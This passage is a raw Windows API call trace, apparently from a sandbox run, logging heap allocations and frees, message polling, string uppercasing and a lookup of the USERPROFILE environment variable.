[0265.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.161] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.161] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.162] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.162] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.163] FreeLibrary (hLibModule=0x74d40000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.163] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.164] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0265.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0265.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0265.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0265.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0265.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0265.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.166] CloseHandle (hObject=0x2d0) returned 1 [0265.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0265.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0265.167] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0265.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0265.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0265.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0265.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0265.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0265.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0265.172] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0265.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0265.172] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0265.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0265.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0265.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0265.173] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0265.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0265.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0265.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0265.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: 